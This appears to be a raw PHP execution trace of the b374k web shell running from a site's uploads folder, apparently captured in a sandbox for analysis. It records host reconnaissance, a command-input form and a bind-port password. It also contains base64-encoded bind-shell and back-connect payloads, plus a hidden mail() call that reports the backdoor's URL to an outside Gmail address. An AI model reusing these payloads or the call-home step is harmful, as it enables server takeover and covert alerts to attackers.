4 33 0 0.009209 693040 trim 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4 33 1 0.009227 693152
4 33 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
3 31 1 0.009260 693120
3 31 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $id = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $prompt = 'www-data $ '
3 34 0 0.009304 693080 getcwd 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 0
3 34 1 0.009319 693128
3 34 R '/var/www/html/uploads'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pwd = '/var/www/html/uploads/'
3 35 0 0.009347 693128 function_exists 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'posix_getpwuid'
3 35 1 0.009362 693168
3 35 R TRUE
3 36 0 0.009375 693128 function_exists 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'posix_getgrgid'
3 36 1 0.009389 693168
3 36 R TRUE
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $posix = TRUE
3 37 0 0.009414 693128 gethostbyname 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'localhost'
3 37 1 0.009457 693208
3 37 R '127.0.0.1'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $server_ip = '127.0.0.1'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $my_ip = '127.0.0.1'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $bindport = '13123'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $bindport_pass = 'b374k'
3 38 0 0.009521 693168 explode 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 2 '/' '/var/www/html/uploads/'
3 38 1 0.009538 693776
3 38 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pwds = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pwdurl = ''
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $i = 0
3 39 0 0.009603 693704 sizeof 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 39 1 0.009622 693736
3 39 R 6
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pathz = ''
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $j = 0
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pathz .= '/'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/"> / </a>'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $i++
3 40 0 0.009701 693784 sizeof 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 40 1 0.009719 693816
3 40 R 6
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pathz = ''
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $j = 0
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pathz .= '/'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pathz .= 'var/'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/var/">var / </a>'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $i++
3 41 0 0.009813 693816 sizeof 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 41 1 0.009831 693848
3 41 R 6
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pathz = ''
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $j = 0
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pathz .= '/'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pathz .= 'var/'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pathz .= 'www/'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/var/www/">www / </a>'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $i++
3 42 0 0.009939 693856 sizeof 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 42 1 0.009957 693888
3 42 R 6
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pathz = ''
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $j = 0
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pathz .= '/'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pathz .= 'var/'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pathz .= 'www/'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pathz .= 'html/'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/var/www/html/">html / </a>'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $i++
3 43 0 0.010081 693904 sizeof 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 43 1 0.010103 693936
3 43 R 6
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pathz = ''
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $j = 0
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pathz .= '/'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pathz .= 'var/'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pathz .= 'www/'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pathz .= 'html/'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pathz .= 'uploads/'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/var/www/html/uploads/">uploads / </a>'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $i++
3 44 0 0.010252 693976 sizeof 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 44 1 0.010271 694008
3 44 R 6
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $buff = 'Apache/2.4.52 (Ubuntu)<br />'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $buff .= 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64<br />'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $buff .= 'uid=33(www-data) gid=33(www-data) groups=33(www-data)<br />'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $buff .= 'server ip : 127.0.0.1 <span class="gaya">|</span> your ip : 127.0.0.1<br />'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $buff .= 'safemode <span class="gaya">OFF<span><br />'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $buff .= ' > <a href="?y=/"> / </a><a href="?y=/var/">var / </a><a href="?y=/var/www/">www / </a><a href="?y=/var/www/html/">html / </a><a href="?y=/var/www/html/uploads/">uploads / </a>'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $port_bind_bd_c = 'bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $port_bind_bd_pl = 'ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8='
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $back_connect = 'fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=='
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $back_connect_c = 'XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw'
3 45 0 0.010486 694488 showdir 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 2 '/var/www/html/uploads/' 'www-data $ '
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $fname = []
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $dname = []
4 46 0 0.010526 694488 function_exists 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'posix_getpwuid'
4 46 1 0.010540 694528
4 46 R TRUE
4 47 0 0.010554 694488 function_exists 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'posix_getgrgid'
4 47 1 0.010569 694528
4 47 R TRUE
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $posix = TRUE
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $user = '????:????'
4 48 0 0.010605 694488 opendir 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/uploads/'
4 48 1 0.010627 694880
4 48 R resource(6) of type (stream)
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $dh = resource(6) of type (stream)
4 49 0 0.010657 694848 readdir 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 resource(6) of type (stream)
4 49 1 0.010680 694920
4 49 R '..'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $file = '..'
4 50 0 0.010705 694880 is_dir 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '..'
4 50 1 0.010722 694928
4 50 R TRUE
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $dname[] = '..'
4 51 0 0.010747 695264 readdir 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 resource(6) of type (stream)
4 51 1 0.010761 695352
4 51 R 'b4k.php.suspected'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $file = 'b4k.php.suspected'
4 52 0 0.010787 695312 is_dir 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'b4k.php.suspected'
4 52 1 0.010804 695368
4 52 R FALSE
4 53 0 0.010817 695328 is_file 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'b4k.php.suspected'
4 53 1 0.010832 695368
4 53 R TRUE
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $fname[] = 'b4k.php.suspected'
4 54 0 0.010856 695704 readdir 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 resource(6) of type (stream)
4 54 1 0.010870 695776
4 54 R '.'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $file = '.'
4 55 0 0.010894 695736 is_dir 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '.'
4 55 1 0.010909 695760
4 55 R TRUE
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $dname[] = '.'
4 56 0 0.010933 695720 readdir 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 resource(6) of type (stream)
4 56 1 0.010947 695800
4 56 R 'prepend.php'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $file = 'prepend.php'
4 57 0 0.010973 695760 is_dir 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'prepend.php'
4 57 1 0.010989 695808
4 57 R FALSE
4 58 0 0.011002 695768 is_file 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'prepend.php'
4 58 1 0.011016 695808
4 58 R TRUE
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $fname[] = 'prepend.php'
4 59 0 0.011041 695768 readdir 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 resource(6) of type (stream)
4 59 1 0.011055 695840
4 59 R 'data'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $file = 'data'
4 60 0 0.011080 695800 is_dir 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'data'
4 60 1 0.011095 695832
4 60 R TRUE
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $dname[] = 'data'
4 61 0 0.011124 695792 readdir 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 resource(6) of type (stream)
4 61 1 0.011138 695872
4 61 R '.htaccess'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $file = '.htaccess'
4 62 0 0.011164 695832 is_dir 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '.htaccess'
4 62 1 0.011179 695880
4 62 R FALSE
4 63 0 0.011192 695840 is_file 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '.htaccess'
4 63 1 0.011206 695880
4 63 R TRUE
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $fname[] = '.htaccess'
4 64 0 0.011231 695840 readdir 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 resource(6) of type (stream)
4 64 1 0.011245 695880
4 64 R FALSE
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $file = FALSE
4 65 0 0.011270 695840 closedir 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 resource(6) of type (stream)
4 65 1 0.011286 695656
4 65 R NULL
4 66 0 0.011300 695640 sort 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 [0 => 'b4k.php.suspected', 1 => 'prepend.php', 2 => '.htaccess']
4 66 1 0.011318 695672
4 66 R TRUE
4 67 0 0.011331 695664 sort 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 [0 => '..', 1 => '.', 2 => 'data']
4 67 1 0.011347 695696
4 67 R TRUE
4 68 0 0.011359 695664 explode 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 2 '/' '/var/www/html/uploads/'
4 68 1 0.011375 696272
4 68 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $path = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4 69 0 0.011411 696200 sizeof 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4 69 1 0.011429 696232
4 69 R 6
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $tree = 6
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $parent = ''
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $buff = ' <form action="?y=/var/www/html/uploads/&x=shell" method="post" style="margin:8px 0 0 0;"> <table class="cmdbox" style="width:50%;"> <tr><td>www-data $ </td><td><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></td></tr> </form> <form action="?" method="get" style="margin:8px 0 0 0;"> <input type="hidden" name="y" value="/var/www/html/uploads/" /> <t'
4 70 0 0.011491 697480 error_reporting 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 0
4 70 1 0.011505 697520
4 70 R 0
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $sub = 'backdoor b374k'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $headers = 'From: k3nz0 \n'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $headers .= 'Content-Type: text/plain; charset=iso-8859-1\n'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $mes .= 'username: ????:????\n'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $mes .= 'password: \n'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $mes .= 'URL: /uploads/b4k.php.suspected\n'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $mes .= 'Referer: '
4 71 0 0.011610 697688 mail 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 4 'free.d0ing.1987@gmail.com' 'backdoor b374k' 'username: ????:????\npassword: \nURL: /uploads/b4k.php.suspected\nReferer: ' 'From: k3nz0 \nContent-Type: text/plain; charset=iso-8859-1\n'
4 71 1 0.012417 697832
4 71 R FALSE
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $i = 0
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $parent .= '/'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $i++
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $parent .= 'var/'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $i++
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $parent .= 'www/'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $i++
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $parent .= 'html/'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $i++
4 72 0 0.012550 697728 fileowner 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '.'
4 72 1 0.012569 697760
4 72 R 0
4 73 0 0.012583 697720 posix_getpwuid 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 0
4 73 1 0.012615 698520
4 73 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 74 0 0.012659 698488 filegroup 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '.'
4 74 1 0.012673 698528
4 74 R 0
4 75 0 0.012687 698488 posix_getgrgid 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 0
4 75 1 0.012712 699144
4 75 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
4 76 0 0.012764 699368 get_perms 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/uploads/'
5 77 0 0.012779 699368 fileperms 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/uploads/'
5 77 1 0.012797 699424
5 77 R 16895
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $mode = 16895
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'x'
4 76 1 0.012927 699424
4 76 R 'rwxrwxrwx'
4 78 0 0.012941 699416 filemtime 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/uploads/'
4 78 1 0.012956 699456
4 78 R 1676247557
4 79 0 0.012969 699416 date 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 2 'd-M-Y H:i' 1676247557
4 79 1 0.013033 701808
4 79 R '12-Feb-2023 19:19'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $buff .= '<tr><td><a href="?y=/var/www/html/uploads/">.</a></td><td>LINK</td><td style="text-align:center;">root<span class="gaya"> : </span>root</td><td>rwxrwxrwx</td><td style="text-align:center;">12-Feb-2023 19:19</td><td><span id="titik1"><a href="?y=/var/www/html/uploads/&edit=/var/www/html/uploads/newfile.php">newfile</a> | <a href="javascript:tukar(\'titik1\',\'titik1_form\');">newfolder</a></span> <form action="?" method="get" id="titik1_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hid'
4 80 0 0.013081 702024 fileowner 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '..'
4 80 1 0.013098 702048
4 80 R 0
4 81 0 0.013111 702008 posix_getpwuid 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 0
4 81 1 0.013139 702808
4 81 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 82 0 0.013264 702008 filegroup 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '..'
4 82 1 0.013281 702048
4 82 R 0
4 83 0 0.013294 702008 posix_getgrgid 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 0
4 83 1 0.013325 702664
4 83 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
4 84 0 0.013379 702200 get_perms 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/'
5 85 0 0.013394 702200 fileperms 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/'
5 85 1 0.013410 702248
5 85 R 16895
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $mode = 16895
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'x'
4 84 1 0.013538 702248
4 84 R 'rwxrwxrwx'
4 86 0 0.013552 702240 filemtime 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/'
4 86 1 0.013567 702280
4 86 R 1676247557
4 87 0 0.013580 702240 date 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 2 'd-M-Y H:i' 1676247557
4 87 1 0.013615 702568
4 87 R '12-Feb-2023 19:19'
